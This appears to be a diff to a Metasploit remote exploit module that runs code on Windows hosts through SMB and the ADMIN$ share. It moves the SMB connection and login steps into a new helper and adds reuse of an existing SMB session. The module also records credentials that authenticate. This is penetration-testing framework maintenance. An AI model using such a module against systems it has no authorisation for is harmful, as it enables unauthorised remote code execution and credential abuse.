@@ -21,6 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
   include Msf::Exploit::WbemExec
   include Msf::Auxiliary::Report
+  include Msf::OptionalSession::SMB
 
   def initialize(info = {})
     super(update_info(info,
@@ -125,28 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
       smbshare = 'ADMIN$'
     end
 
-    print_status("Connecting to the server...")
-    connect
-
-    print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
-    smb_login
-
-    if not simple.client.auth_user and not datastore['ALLOW_GUEST']
-      print_line(" ")
-      print_error(
-        "FAILED! The remote host has only provided us with Guest privileges. " +
-        "Please make sure that the correct username and password have been provided. " +
-        "Windows XP systems that are not part of a domain will only provide Guest privileges " +
-        "to network logins by default."
-      )
-      print_line(" ")
-      disconnect
-      return
-    end
-
-    if datastore['SMBUser'].to_s.strip.length > 0
-      report_auth
-    end
+    create_simple_smb_client!
 
     case target.name
     when 'Automatic'
@@ -214,4 +194,37 @@ class MetasploitModule < Msf::Exploit::Remote
     login_data.merge!(service_data)
     create_credential_login(login_data)
   end
+
+  def create_simple_smb_client!
+    if session
+      print_status("Using existing session #{session.sid}")
+      client = session.client
+      self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
+
+    else
+      print_status('Connecting to the server...')
+      connect
+
+      print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
+      smb_login
+
+      if !simple.client.auth_user && !datastore['ALLOW_GUEST']
+        print_line
+        print_error(
+          'FAILED! The remote host has only provided us with Guest privileges. ' \
+            'Please make sure that the correct username and password have been provided. ' \
+            'Windows XP systems that are not part of a domain will only provide Guest privileges ' \
+            'to network logins by default.'
+        )
+        print_line
+        disconnect
+        return
+      end
+
+      unless datastore['SMBUser'].to_s.strip.empty?
+        report_auth
+      end
+
+    end
+  end
 end
